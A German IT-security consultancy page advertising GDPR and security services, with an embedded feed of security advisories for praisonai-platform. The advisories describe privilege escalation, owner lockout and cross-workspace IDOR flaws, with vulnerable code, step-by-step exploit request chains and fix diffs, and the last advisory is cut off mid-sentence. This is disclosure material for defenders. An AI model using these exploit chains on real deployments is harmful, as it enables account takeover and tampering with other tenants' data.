Beratung zu IT-Sicherheit & Datenschutz


Die Datenschutz-Grundverordnung beziehungsweise das Bundesdatenschutzgesetz betreffen uns alle - jeder, der Daten von Dritten erfasst, speichert oder verarbeitet muss den europäischen Standard einhalten. Die umfangreichen Gesetzestexte regeln Rechte und Pflichten aber auch technische und organisatorische Maßnahmen zum Datenschutz, Aufbewahrungspflichten, Sicherheitsstandards und Vorgaben zur Dokumentation von Verfahren und Vorfällen sowie die Vorgaben zur Berufung eines Datenschutzbeauftragten mit einer besonderen Aufsichts- und Beratungspflicht.

Die DSGVO und das BDSG sollte dabei nicht nur schriftlich in langen Rechtstexten, Datenschutzhinweisen und Verfahrensdokumentationen umgesetzt werden sondern es sollten konkrete technische Standards etabliert und eingehalten werden um dem Verlust von Daten vorzubeugen, der unberechtigten Nutzung von Daten einhalt zu gebieten und Angreifer und Hacker zuverlässig abzuwehren.

Da umfangreiches Know-How sowohl im Bezug auf die Rechtsgrundlagen als auch auf die technischen Risiken und Möglichkeiten erforderlich sind um ein angemessenes Datenschutzkonzept zu etablieren haben viele Unternehmen große Schwierigkeiten bei der Umsetzung. Unsere IT- und Datenschutzberatung setzt hier an - mit unserer Expertise können wir Sie dabei unterstützen Datenschutz technisch und rechtlich angemessen umzusetzen.
Wir unterstützen Sie gerne! »

  Unsere Leistungen

Datenschutzberatung durch geprüften DSB
Umsetzung von IT-Richtlinien / Gesetzen
Analyse & Beratung zur IT-Sicherheit
Erstellung von Dokumentationen



Was steckt dahinter?

Das "Who is Who" - DSGVO, GDPR, BDSG, TMG, ...
Innerhalb der EU gilt seit 2018 die sogenannte General Data Protection Regulation (GDPR), die in Deutschland unter der Bezeichnung "Datenschutz-Grundverordnung" (DSGVO) in nationales Recht umgesetzt wurde. Das Bundesdatenschutzgesetz (BDSG) präzisiert die Regelungen der DSGVO und fügt weitere nationale Regelungen hinzu. Für Betreiber von Internetangeboten ist zudem das Telemediengesetzes (TMG) relevant. Dies bezieht sich allerdings weniger auf den Datenschutz als auf grundlegende Regelungen im IT-Recht.

Was ist Datenschutzberatung?
Unser TÜV geprüfter Datenschutzbeauftragter mit juristischer Qualifikation berät Sie gerne zu Fragen rund um die Umsetzung von Datenschutzrecht in Ihren konkreten Projekten. Darüber hinausgehende zivilrechtliche Fragestellungen hingegen fallen nicht in den Bereich der Datenschutzberatung.




Die rechtliche Seite: DSGVO

Die DSGVO beziehungsweise das Bundesdatenschutzgesetz stellen verschiedene Forderungen an Unternehmen und Organisationen die zwingend einzuhalten sind um rechtskonform Daten zu verarbeiten. Als Verarbeiter von Daten zählen Sie schon dann, wenn Sie die Daten von Mitarbeitenden oder Kunden erfassen oder speichern.

Damit gilt die DSGVO sowohl für Kleinstunternehmen und Vereine wie auch für große Unternehmen und global Player.

Während die gesetzlichen Regelungen in vielen Bereichen sehr präzise Vorgaben machen welche Dokumente und Verfahren es geben muss und welche Rechte, Pflichten und Fristen gelten, gibt es in vielen Bereichen auch große Unsicherheiten. Häufiger werden Maßnahmen gefordert die sich am Stand der Technik orientieren oder technische Notwendigkeit und Machbarkeit zur Maßgabe machen.

Im Rahmen einer rechtlichen Datenschutzberatung geht es darum Sie über Ihre Rechte und Pflichten als Datenverarbeiter zu informieren und gemeinsam zu prüfen und sicherzustellen, dass die geforderten Unterlagen und Prozesse korrekt umgesetzt werden. Wir zeigen Ihnen gernen auch Tools und Best Practices zur Umsetzung der Rechte Betroffener und Ihrer Pflichten als Verarbeiter.

Wir unterstützen Sie dabei den Überblick zu bewahren!

Die technische Seite: IT-Sicherheit

Während die rechtliche Seite sich viel mit Fragen nach Rechten und Pflichten, der Haftung und der Verantwortung beschäftigt, ist die technische Seite des Datenschutzes sehr viel präziser:

Wie verhindern Sie, dass Ihre Daten in falsche Hände kommen?

Sie sammeln und verarbeiten vermutlich jeden Tag Daten von Dritten und speichern diese in internen Tools, verarbeiten sie auf Ihren oder fremden Servern, übertragen Sie zu Dienstleistern oder bauen sogar einen wesentlichen Teil Ihrer Tätigkeit auf der Verarbeitung auf.

Ein potentieller Angreifer oder Hacker versucht stets den schwächsten Punkt zu identifizieren, um Zugriff zu Ihren Daten zu erlangen. Häufig nutzen Hacker dazu bekannte Sicherheitslücken nicht aktualisierter Systeme aus, suchen nach vergessenen oder auch versehentlich offen stehenden Türen oder greifen sensible Zugangsdaten ab, wodurch sie auch ohne große Anstrengungen unberechtigten Zugang erlangen und viel Schaden anrichten können. Dabei müssen Sie nichtmal das primäre Ziel des Angriffs sein, sondern könnten vermeintlich auch Opfer eines größer angelegten Angriffs auf mehrere Unternehmen werden.

Wir unterstützen Sie dabei, ein Sicherheitskonzept in Ihrer IT zu etablieren und die Angriffflächen zu reduzieren.





IT-Sicherheit - bleiben Sie auf dem Laufenden


Täglich werden neue Schwachstellen, Angriffs-Vektoren, Cyber-Attaken und Fehler in Software, Netzwerken und Infrastrukturen bekannt - teilweise betreffen diese nur bestimmte Softwarelösungen oder spezifische Szenarien, manchmal betreffen Sie jedoch auch ganze Industriezweige, weit verbreitete Arbeitsweisen und grundlegende Technologien wie bei Heartbleed (SSL) oder Log4Shell (Protokollierung). Ergreifen Sie Maßnahmen, um Ihre Infrastruktur und Daten sicher zu halten.

Gemeinsam erfassen wir, welche Komponten und Abhängigkeiten Sie einsetzen und überwachen die CVE und viele weitere Quellen um im Falle von Mängeln oder Angriffspunkten schnell handeln zu können.

Wir simulieren Angriffe und Testen Ihre Anwendungen, Webseiten, die Infrastruktur und Prozesse auf mögliche Sicherheitslücken, Mängel und Angriffsvektoren um Risiken fürhzeitig zu erknennen und Lücken zu schließen.

Wir implementieren aktiv Monitore und überwachen somit Anfragen um frühzeitig Angriffe und verdächtige Aktivitäten zu identifizieren. Verdächte Aktivitäten können zur Alarmierung oder zu automatischen Sperrungen und Ausschlüssen führen, um einen hohen Standard zu gewährleisten.


Den Bedrohungen der IT-Welt sind Sie nicht schutzlos ausgeliefert - es ist jedoch wichtig dem Thema IT-Sicherheit Aufmerksamkeit zu schenken, um einen verantwortungsbewussten und rechtskonformen Umgang mit Unternehmens- und Kundendaten zu gewährleisten.
Risiko / Label Veröffentlichung
Risiko 9.5 / 10 CVE-2026-47416 vor 1 Stunde(n)
## Summary **Type:** Vertical privilege escalation. The `PATCH /workspaces/{workspace_id}/members/{user_id}` endpoint is gated by `require_workspace_member(workspace_id)`, which defaults to `min_role="member"` and is never overridden by the route. The handler then calls `MemberService.update_role(workspace_id, user_id, body.role)` which sets the target member's role to whatever the request body specifies, with no check that the caller has owner-or-admin privilege, no check that the new role is not higher than the caller's own, and no check that the caller is not silently promoting themselves. **File:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 115-127; `services/member_service.py`, lines 55-69; `api/deps.py`, lines 54-73. **Root cause:** `require_workspace_member` exists with a `min_role` parameter (deps.py:58) but FastAPI's `Depends(require_workspace_member)` cannot pass arguments, so every route uses the default `"member"`. The route then passes the URL-supplied `user_id` and the body-supplied `role` directly to `MemberService.update_role`, which contains zero permission checks: it loads the member by composite key and assigns `member.role = new_role`. A user with the lowest possible privilege ("member") thus sets their own role to "owner" with one HTTP PATCH, completing a member-to-owner privilege escalation in a single request. ## Affected Code **File 1:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 115-127. ```python @router.patch("/{workspace_id}/members/{user_id}", response_model=MemberResponse) async def update_member_role( workspace_id: str, user_id: str, body: MemberUpdate, user: AuthIdentity = Depends(require_workspace_member), # <-- BUG: defaults to min_role="member"; no role gate session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) member = await member_svc.update_role(workspace_id, user_id, body.role) # <-- writes any role to any member if member is None: raise HTTPException(status_code=404, detail="Member not found") return MemberResponse.model_validate(member) ``` **File 2:** `src/praisonai-platform/praisonai_platform/services/member_service.py`, lines 55-69. ```python async def update_role( self, workspace_id: str, user_id: str, new_role: str, ) -> Optional[Member]: """Update a member's role.""" if new_role not in VALID_ROLES: # only validates the *value*, not the *caller's right* raise ValueError(f"Invalid role: {new_role}. Must be one of {VALID_ROLES}") member = await self.get(workspace_id, user_id) if member is None: return None member.role = new_role # <-- BUG: no caller-role check, no target-vs-caller hierarchy check await self._session.flush() return member ``` **File 3:** `src/praisonai-platform/praisonai_platform/api/deps.py`, lines 54-73. ```python async def require_workspace_member( workspace_id: str, user: AuthIdentity = Depends(get_current_user), session: AsyncSession = Depends(get_db), min_role: str = "member", # <-- default that no route overrides ) -> AuthIdentity: member_svc = MemberService(session) has = await member_svc.has_role(workspace_id, user.id, min_role) if not has: raise HTTPException(status_code=403, detail="Not a member of this workspace or insufficient role") user.workspace_id = workspace_id return user ``` **Why it's wrong:** `require_workspace_member` was clearly designed to be tunable per-route — the `min_role` parameter is right there — but `Depends(require_workspace_member)` in FastAPI cannot pass arguments to a dependency, so every route resolves to the default `"member"`. The author's intent is also evident in `MemberService.has_role` (member_service.py:80-96), which implements an `owner > admin > member` hierarchy that this endpoint should be enforcing. The endpoint uses none of it. The `VALID_ROLES = {"owner", "admin", "member"}` enum check (member_service.py:62) only validates the *new role string is recognised*, not that the *caller has the right to assign it*. As a result, a member can write `{"role": "owner"}` to their own membership row and become owner in one PATCH. ## Exploit Chain 1. Attacker registers an account and joins (or is invited to) any workspace `W` as a "member" (the lowest privilege tier — typically anyone can be added by an owner during onboarding, or self-joins via an invite link). State: attacker has a JWT, is a `Member(workspace_id=W, user_id=attacker, role="member")`. 2. Attacker sends `PATCH /workspaces/W/members/` with `Authorization: Bearer ` and body `{"role": "owner"}`. State: control flow enters `update_member_role`. 3. `require_workspace_member(W, attacker)` runs. Its default `min_role="member"` is satisfied because the attacker is a member. The dependency returns the attacker's identity. State: route handler proceeds with no further role gate. 4. `MemberService.update_role(W, attacker, "owner")` runs. `VALID_ROLES` accepts `"owner"`. `self.get(W, attacker)` returns the attacker's existing member row. The next line, `member.role = "owner"`, mutates the attacker's role in place. `await self._session.flush()` commits. State: attacker is now `Member(workspace_id=W, user_id=attacker, role="owner")`. 5. Attacker re-issues `GET /auth/me` (or any owner-gated endpoint) and is now treated as workspace owner. State: full administrative control of the workspace, including the ability to add/remove members, change settings, delete the workspace, and exfiltrate everything via the agent/issue/project/comment IDORs that were filed as separate advisories. 6. Final state: starting from the lowest workspace privilege, the attacker holds owner of the workspace within one HTTP request. The same primitive also lets the attacker DEMOTE the legitimate owner by sending `PATCH /workspaces/W/members/` with `{"role": "member"}` — owner lockout in two requests total. ## Security Impact **Severity:** sec-critical. CVSS 9.1: network attack, low complexity, low privileges (the lowest tier on the platform), no user interaction, scope changed (the privilege boundary the attacker crosses is the workspace owner, a different security principal), high confidentiality and integrity (full workspace control), no availability claim (the attacker can also DELETE the workspace via the companion `delete_workspace` advisory, but that is a separate finding). **Attacker capability:** with one workspace-member token plus one PATCH request, the attacker becomes workspace owner. From there: add/remove any user as owner, change every workspace setting (including the `settings` JSON blob), demote the legitimate owner to "member", or chain into the companion `delete_workspace` advisory to wipe the workspace entirely. In multi-tenant SaaS deployments where any signup yields a member-level account in some default workspace, this is effectively pre-auth. **Preconditions:** `praisonai-platform` is deployed multi-tenant (more than one workspace exists OR the deployment grants member access on signup); the attacker has any membership token in the target workspace. **Differential:** source-inspection-verified end-to-end. The asymmetry between `require_workspace_member`'s `min_role` parameter (which exists, defaults to "member", and is never overridden) and `MemberService.has_role`'s clearly tiered `owner > admin > member` hierarchy (which exists but is never invoked with anything but the default) is the smoking gun. With the suggested fix below, the route resolves with `min_role="owner"`, the attacker's member-level token fails the gate at the dependency, and the privilege escalation never reaches the service layer. ## Suggested Fix The fix has two parts. First, the route must resolve `require_workspace_member` with `min_role="owner"` (or at least `"admin"`). Second, `MemberService.update_role` should refuse to set a target's role higher than the caller's own role, so that an admin cannot accidentally produce another owner. ```diff --- a/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py +++ b/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py @@ -115,11 +115,16 @@ +def _require_owner(workspace_id: str, user, session): + return require_workspace_member(workspace_id, user, session, min_role="owner") + @router.patch("/{workspace_id}/members/{user_id}", response_model=MemberResponse) async def update_member_role( workspace_id: str, user_id: str, body: MemberUpdate, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(_require_owner), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + if not await member_svc.has_role(workspace_id, user.id, "owner"): + raise HTTPException(status_code=403, detail="Only owners can change member roles") member = await member_svc.update_role(workspace_id, user_id, body.role) ``` Defence-in-depth in the service layer: ```diff --- a/src/praisonai-platform/praisonai_platform/services/member_service.py +++ b/src/praisonai-platform/praisonai_platform/services/member_service.py @@ -55,7 +55,7 @@ - async def update_role(self, workspace_id: str, user_id: str, new_role: str) -> Optional[Member]: + async def update_role(self, workspace_id: str, caller_id: str, user_id: str, new_role: str) -> Optional[Member]: """Update a member's role.""" + if not await self.has_role(workspace_id, caller_id, "owner"): + raise PermissionError("Only owners can update member roles") if new_role not in VALID_ROLES: raise ValueError(...) ``` The companion endpoints `add_member`, `remove_member`, `delete_workspace`, and `update_workspace` exhibit the same `Depends(require_workspace_member)` default-min-role pattern and are filed as their own advisories so each gets a separate CVE.
Risiko 7.5 / 10 CVE-2026-47409 vor 1 Stunde(n)
## Summary **Type:** Authorization bypass enabling owner lockout. The `DELETE /workspaces/{workspace_id}/members/{user_id}` endpoint is gated only by `require_workspace_member(workspace_id)` (default `min_role="member"`). Any member can remove any other member, including the workspace owner, using a single DELETE. There is no caller-role check, no target-role check, no "cannot remove last owner" guard. **File:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 130-140; `services/member_service.py`, lines 71-78. **Root cause:** `MemberService.remove(workspace_id, user_id)` performs the deletion without any caller-permission check or owner-protection logic. The route accepts the URL-supplied `user_id` and dispatches it straight through. The role hierarchy (`MemberService.has_role`) is implemented but never invoked here. A member-tier attacker can issue `DELETE .../members/` and immediately lock the legitimate owner out of the workspace. ## Affected Code **File 1:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 130-140. ```python @router.delete("/{workspace_id}/members/{user_id}", status_code=status.HTTP_204_NO_CONTENT) async def remove_member( workspace_id: str, user_id: str, user: AuthIdentity = Depends(require_workspace_member), # <-- BUG: defaults to min_role="member" session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) removed = await member_svc.remove(workspace_id, user_id) # <-- removes any member, including owner if not removed: raise HTTPException(status_code=404, detail="Member not found") ``` **File 2:** `src/praisonai-platform/praisonai_platform/services/member_service.py`, lines 71-78. ```python async def remove(self, workspace_id: str, user_id: str) -> bool: """Remove a member from a workspace.""" member = await self.get(workspace_id, user_id) if member is None: return False await self._session.delete(member) # <-- BUG: no caller-role check, no last-owner protection await self._session.flush() return True ``` **Why it's wrong:** member-removal is the textbook capability that must be gated on owner role. Removing the workspace owner is a permanent denial-of-service against the legitimate owner unless another owner exists. There must be (a) a caller min-role gate of "owner" or "admin", (b) a check that prevents removing a member whose role is higher than the caller's, and (c) a check that the workspace is left with at least one owner. None of these exist. ## Exploit Chain 1. Attacker is a member of workspace `W` with role "member". State: attacker holds JWT. 2. Attacker enumerates the workspace owner's `user_id` via `GET /workspaces/W/members` (list_members has the same default-member gate, separate finding). Owner UUID `O_id` is now known. State: attacker holds `O_id`. 3. Attacker sends `DELETE /workspaces/W/members/O_id` with `Authorization: Bearer `. State: control flow enters `remove_member`. 4. `require_workspace_member(W, attacker)` passes (attacker is a member). `MemberService.remove(W, O_id)` deletes the owner's member row. State: `Member(workspace_id=W, user_id=O_id, role="owner")` is gone. 5. Owner attempts `GET /workspaces/W/...` and `require_workspace_member(W, O_id)` returns 403. State: legitimate owner is now locked out of their own workspace. 6. Combined with the `update_member_role` companion advisory, the attacker first promotes themselves to owner, then removes the legitimate owner, then has uncontested control. Combined with `delete_workspace`, the attacker wipes the workspace after kicking the owner. 7. Final state: with one member-level token, the attacker locks the legitimate owner out of their own workspace permanently. The owner has no recourse other than database-level admin intervention. ## Security Impact **Severity:** sec-high. CVSS 8.1: network attack, low complexity, low privileges, no user interaction, scope unchanged, no confidentiality, high integrity (membership table corrupted), high availability (legitimate owner cannot access their own workspace). **Attacker capability:** with one workspace-member token plus one DELETE request, the attacker permanently locks any other member (including the workspace owner) out of the workspace. **Preconditions:** `praisonai-platform` is deployed multi-tenant; attacker has any membership token; owner's user_id is reachable via the (unauthenticated-for-member) `list_members` endpoint. **Differential:** source-inspection-verified. The asymmetry between `require_workspace_member`'s tunable `min_role` parameter and this endpoint's use of the default value confirms the gap. With the suggested fix below, member-tier tokens fail the gate, and removing the workspace's last owner triggers the additional guard. ## Suggested Fix ```diff --- a/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py +++ b/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py @@ -130,11 +130,21 @@ @router.delete("/{workspace_id}/members/{user_id}", status_code=status.HTTP_204_NO_CONTENT) async def remove_member( workspace_id: str, user_id: str, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(_require_workspace_owner), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + target = await member_svc.get(workspace_id, user_id) + if target is not None and target.role == "owner": + # Refuse to remove the last owner. + owners = [m for m in await member_svc.list_members(workspace_id) if m.role == "owner"] + if len(owners) <= 1: + raise HTTPException(status_code=409, detail="Cannot remove the last workspace owner") removed = await member_svc.remove(workspace_id, user_id) if not removed: raise HTTPException(status_code=404, detail="Member not found") ``` The four companion workspace-mutation endpoints exhibit the same default-min-role gap and are filed as their own advisories.
Risiko 7.5 / 10 CVE-2026-47414 vor 1 Stunde(n)
## Summary **Type:** Insecure Direct Object Reference. Five label endpoints — `PATCH /workspaces/{workspace_id}/labels/{label_id}`, `DELETE .../labels/{label_id}`, `POST .../issues/{issue_id}/labels/{label_id}`, `DELETE .../issues/{issue_id}/labels/{label_id}`, `GET .../issues/{issue_id}/labels` — gate access on `require_workspace_member(workspace_id)` only and pass URL-supplied `label_id` and `issue_id` straight through to `LabelService` without verifying either belongs to the workspace. **File:** `src/praisonai-platform/praisonai_platform/services/label_service.py`, lines 35-100; route handlers at `src/praisonai-platform/praisonai_platform/api/routes/labels.py`, lines 42-106. **Root cause:** identical pattern to the agent / issue / project / comment IDORs in this codebase: the route's `workspace_id` is used as a membership predicate but never threaded through to the service layer. `LabelService.get(label_id)` runs `session.get(IssueLabel, label_id)` with no workspace filter; `update`/`delete` inherit the gap; `add_to_issue(issue_id, label_id)` and `remove_from_issue(issue_id, label_id)` write/delete association rows without verifying either ID belongs to the membership-checked workspace; `list_for_issue(issue_id)` reads them. ## Affected Code **File 1:** `src/praisonai-platform/praisonai_platform/services/label_service.py`, lines 35-100. ```python class LabelService: ... async def get(self, label_id: str) -> Optional[IssueLabel]: return await self._session.get(IssueLabel, label_id) # <-- BUG: no workspace_id predicate async def update( self, label_id: str, ... ) -> Optional[IssueLabel]: label = await self.get(label_id) # <-- inherits the gap ... async def delete(self, label_id: str) -> bool: label = await self.get(label_id) # <-- inherits the gap ... async def add_to_issue(self, issue_id: str, label_id: str) -> None: # writes a row in issue_label association table; no workspace check on either id async def remove_from_issue(self, issue_id: str, label_id: str) -> None: # deletes from association table; no workspace check on either id async def list_for_issue(self, issue_id: str) -> list[IssueLabel]: # reads from association table; no workspace check on issue_id ``` **File 2:** `src/praisonai-platform/praisonai_platform/api/routes/labels.py`, lines 42-106. ```python @router.patch("/labels/{label_id}", response_model=LabelResponse) async def update_label(workspace_id: str, label_id: str, body: LabelUpdate, ...): svc = LabelService(session) label = await svc.update(label_id, body.name, body.color) # <-- writes any label in the DB ... @router.delete("/labels/{label_id}", ...) async def delete_label(workspace_id: str, label_id: str, ...): deleted = await svc.delete(label_id) # <-- deletes any label in the DB ... @router.post("/issues/{issue_id}/labels/{label_id}", ...) async def add_label_to_issue(workspace_id: str, issue_id: str, label_id: str, ...): await svc.add_to_issue(issue_id, label_id) # <-- attaches any label to any issue cross-workspace @router.delete("/issues/{issue_id}/labels/{label_id}", ...) async def remove_label_from_issue(workspace_id: str, issue_id: str, label_id: str, ...): await svc.remove_from_issue(issue_id, label_id) # <-- detaches any label from any issue cross-workspace @router.get("/issues/{issue_id}/labels", ...) async def list_issue_labels(workspace_id: str, issue_id: str, ...): labels = await svc.list_for_issue(issue_id) # <-- reads label assignments for any issue ``` **Why it's wrong:** the `workspace_id` URL segment is treated as a UI hint; the actual `label_id` and `issue_id` lookups query the database without a workspace constraint. The `MemberService` in this same codebase uses a composite key correctly; the label service does not. The `add_to_issue` and `remove_from_issue` paths are particularly nasty because they touch *two* unverified IDs at once: an attacker can attach a foreign workspace's label to a foreign workspace's issue (or detach the legitimate labels), corrupting both sides of an association the attacker has no business touching. ## Exploit Chain 1. Attacker registers a workspace `W_attacker` (member) and harvests a foreign-workspace `label_id` `L_T` and a foreign-workspace `issue_id` `I_T`. Both leak via `list_labels` responses (which include label IDs — but only for `W_attacker`; for the target the IDs come from issue records that include label associations, activity feeds, exported dumps, error messages). State: attacker holds `L_T` and `I_T`. 2. Attacker authenticates and sends `PATCH /workspaces/W_attacker/labels/L_T` with `{"name": "", "color": "#000000"}`. `require_workspace_member(W_attacker, attacker)` passes. `LabelService.update(L_T, ...)` loads the foreign label and renames it. State: every issue across the foreign workspace that bears this label now displays the attacker-chosen name and colour. 3. Attacker sends `DELETE /workspaces/W_attacker/labels/L_T`. `LabelService.delete(L_T)` deletes the foreign label, dropping every issue-label association row that referenced it (cascade or orphan, depending on schema). State: foreign workspace's labels are gone or corrupted. 4. Attacker sends `POST /workspaces/W_attacker/issues/I_T/labels/L_T2` to attach foreign label `L_T2` to foreign issue `I_T`. `LabelService.add_to_issue(I_T, L_T2)` writes the association row regardless of either ID's workspace. State: the foreign issue now carries an arbitrary attacker-chosen label, which surfaces in every filter/search/board view in the foreign workspace's UI. 5. Attacker sends `DELETE /workspaces/W_attacker/issues/I_T/labels/L_legit` to strip the legitimate label off the foreign issue. State: triagers can no longer find the issue via label filters. 6. Attacker sends `GET /workspaces/W_attacker/issues/I_T/labels` to read the current label set on any foreign issue. State: the attacker fingerprints the foreign workspace's triage taxonomy. 7. Final state: with one workspace-member token plus harvested foreign IDs, the attacker rewrites and deletes other workspaces' labels, attaches/detaches arbitrary labels on other workspaces' issues, and reads triage state across the deployment. ## Security Impact **Severity:** sec-moderate. CVSS 6.3: network attack, low complexity, low privileges, no user interaction, scope unchanged. The integrity damage is high (rename/delete of foreign labels is permanent and silent; cross-workspace label-attachment corrupts UI filters), confidentiality is low (label names are not the most sensitive field but do leak triage taxonomy), availability low (foreign workspaces may lose triage visibility into their own issues until the labels are restored). **Attacker capability:** rename and delete any label in the multi-tenant deployment; attach any label to any issue; detach any label from any issue; list label assignments for any issue. Combined with the companion `IssueService` IDOR (separate advisory), the attacker can also modify the underlying issue, making the cross-workspace tampering very difficult to detect. **Preconditions:** `praisonai-platform` is deployed multi-tenant; the attacker has any membership token; target IDs are known or guessable. **Differential:** source-inspection-verified end-to-end. The asymmetry between `LabelService.list_for_workspace(workspace_id)` (correctly workspace-scoped) and `LabelService.get(label_id) / add_to_issue(issue_id, label_id)` (no workspace check) confirms the gap. With the suggested fix below, label and issue IDs that do not belong to the membership-checked workspace return 404, and the attacker cannot touch them. ## Suggested Fix Make every single-row label lookup take the workspace predicate; verify both `issue_id` and `label_id` belong to `workspace_id` for the association routes. ```diff --- a/src/praisonai-platform/praisonai_platform/services/label_service.py +++ b/src/praisonai-platform/praisonai_platform/services/label_service.py @@ -33,7 +33,12 @@ class LabelService: return label - async def get(self, label_id: str) -> Optional[IssueLabel]: - return await self._session.get(IssueLabel, label_id) + async def get(self, workspace_id: str, label_id: str) -> Optional[IssueLabel]: + stmt = select(IssueLabel).where( + IssueLabel.id == label_id, + IssueLabel.workspace_id == workspace_id, + ) + return (await self._session.execute(stmt)).scalar_one_or_none() - async def add_to_issue(self, issue_id: str, label_id: str) -> None: + async def add_to_issue(self, workspace_id: str, issue_id: str, label_id: str) -> None: + # Verify both ids belong to workspace_id before writing the association row. ``` Then update the route handlers in `routes/labels.py` to thread `workspace_id` through every call. The same single-key-lookup pattern is filed separately for `AgentService`, `IssueService`, `ProjectService`, and `CommentService` — each is its own exploitable IDOR.
Risiko 7.5 / 10 CVE-2026-47406 vor 2 Stunde(n)
## Summary **Type:** Insecure Direct Object Reference. The dependency endpoints (`POST/GET /workspaces/{workspace_id}/issues/{issue_id}/dependencies` and `DELETE .../dependencies/{dep_id}`) gate access on `require_workspace_member(workspace_id)` only, then dispatch to `DependencyService` calls that take URL/body-supplied issue and dependency IDs without verifying any of them belong to the membership-checked workspace. Most damaging: `create_dependency` accepts `body.depends_on_issue_id` from the request body — that ID is checked against nothing — letting an attacker create a "blocks" or "related" link between any two issues anywhere in the database. **File:** `src/praisonai-platform/praisonai_platform/api/routes/dependencies.py`, lines 22-58; `services/dependency_service.py`, lines 26-65. **Root cause:** the same `Depends(require_workspace_member)` default-min-role pattern as the companion IDORs, plus a service layer (`DependencyService`) where every method takes raw IDs and queries them directly. `create(issue_id, depends_on_issue_id, ...)` writes a row with no workspace verification on either ID. `list_for_issue(issue_id)` returns dependencies in either direction. `delete(dep_id)` is a primary-key delete with no workspace predicate. ## Affected Code **File 1:** `src/praisonai-platform/praisonai_platform/api/routes/dependencies.py`, lines 22-58. ```python @router.post("/", response_model=DependencyResponse, status_code=status.HTTP_201_CREATED) async def create_dependency( workspace_id: str, issue_id: str, body: DependencyCreate, user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): svc = DependencyService(session) dep = await svc.create(issue_id, body.depends_on_issue_id, body.type) # <-- BUG: neither id is workspace-checked return DependencyResponse.model_validate(dep) @router.get("/", response_model=List[DependencyResponse]) async def list_dependencies( workspace_id: str, issue_id: str, user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): svc = DependencyService(session) deps = await svc.list_for_issue(issue_id) # <-- BUG: returns dependencies for any issue return [DependencyResponse.model_validate(d) for d in deps] @router.delete("/{dep_id}", status_code=status.HTTP_204_NO_CONTENT) async def delete_dependency( workspace_id: str, issue_id: str, dep_id: str, user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): svc = DependencyService(session) deleted = await svc.delete(dep_id) # <-- BUG: deletes any dependency by id if not deleted: raise HTTPException(status_code=404, detail="Dependency not found") ``` **File 2:** `src/praisonai-platform/praisonai_platform/services/dependency_service.py`, lines 26-65. ```python async def create(self, issue_id: str, depends_on_issue_id: str, dep_type: str = "blocks") -> IssueDependency: if dep_type not in VALID_TYPES: raise ValueError(...) dep = IssueDependency( issue_id=issue_id, # <-- accepts any depends_on_issue_id=depends_on_issue_id, # <-- accepts any (from request body) type=dep_type, ) self._session.add(dep); await self._session.flush(); return dep async def list_for_issue(self, issue_id: str) -> list[IssueDependency]: stmt = select(IssueDependency).where( (IssueDependency.issue_id == issue_id) | (IssueDependency.depends_on_issue_id == issue_id) ) return list((await self._session.execute(stmt)).scalars().all()) async def delete(self, dep_id: str) -> bool: dep = await self.get(dep_id) # session.get(IssueDependency, dep_id) — no workspace check ... ``` **Why it's wrong:** the request-body `depends_on_issue_id` is the worst part: an attacker can link any two issues across any two workspaces, polluting both workspaces' dependency graphs with attacker-chosen relationships ("blocks", "blocked_by", "related"). The triagers in the foreign workspace see their issue suddenly blocked by an unrelated foreign issue, breaking sprint planning and creating false correlation. The `delete(dep_id)` path lets an attacker remove legitimate cross-issue links between any two foreign workspaces, also disrupting their planning. The `list_for_issue` path leaks the dependency graph for any issue in the deployment. ## Exploit Chain 1. Attacker is a member of workspace `W_attacker` and harvests two foreign-workspace issue UUIDs `I1` (in `W_target1`) and `I2` (in `W_target2`). They leak via the activity feed, comment threads, error messages, exported dumps, the agent prompt history, or any other channel that ever serialises an issue ID. State: attacker holds two foreign issue UUIDs. 2. Attacker sends `POST /workspaces/W_attacker/issues/I1/dependencies` with `Authorization: Bearer ` and body `{"depends_on_issue_id": "I2", "type": "blocks"}`. State: control flow enters `create_dependency` with `issue_id=I1` (foreign), `depends_on_issue_id=I2` (foreign). 3. `require_workspace_member(W_attacker, attacker)` passes (attacker is a member of `W_attacker`). `DependencyService.create(I1, I2, "blocks")` writes a new row `IssueDependency(issue_id=I1, depends_on_issue_id=I2, type="blocks")`. State: there is now a cross-workspace dependency between two foreign issues, written by the attacker. 4. The triage UIs of `W_target1` and `W_target2` now show that the foreign issue is blocked by an unrelated issue in another workspace. Workflow rules that key off "cannot close while blocked" will refuse to let the legitimate triagers close `I1`. State: foreign workflow disrupted. 5. Attacker repeats with `GET /workspaces/W_attacker/issues/I1/dependencies` to read the dependency graph for any foreign issue (information disclosure, project relationship mapping), or with `DELETE .../{dep_id}` (after enumerating dep_ids via the list call) to strip legitimate dependencies between foreign issues, breaking blocked-by chains. 6. Final state: with one workspace-member token, the attacker reads, writes, and deletes dependencies on every issue in the multi-tenant deployment, polluting the dependency graphs of foreign workspaces. ## Security Impact **Severity:** sec-high. CVSS 7.6: network attack, low complexity, low privileges, no user interaction, scope unchanged, high confidentiality (cross-workspace dependency graph disclosure), high integrity (cross-workspace dependency injection and deletion), no availability claim (workflow disruption is integrity, not availability). **Attacker capability:** read any issue's dependency graph; create arbitrary "blocks" / "blocked_by" / "related" links between any two issues across any two workspaces; delete any dependency by id. The most surprising primitive is the cross-workspace LINKING — the only one of the IDORs in this codebase where a single attacker request can affect TWO foreign workspaces at once. **Preconditions:** `praisonai-platform` is deployed multi-tenant; attacker has any membership token; foreign issue UUIDs are reachable. **Differential:** source-inspection-verified end-to-end. The asymmetry between this service (no workspace predicate anywhere) and `MemberService.get(workspace_id, user_id)` (correctly composite-keyed) confirms the gap. With the suggested fix below, the route would 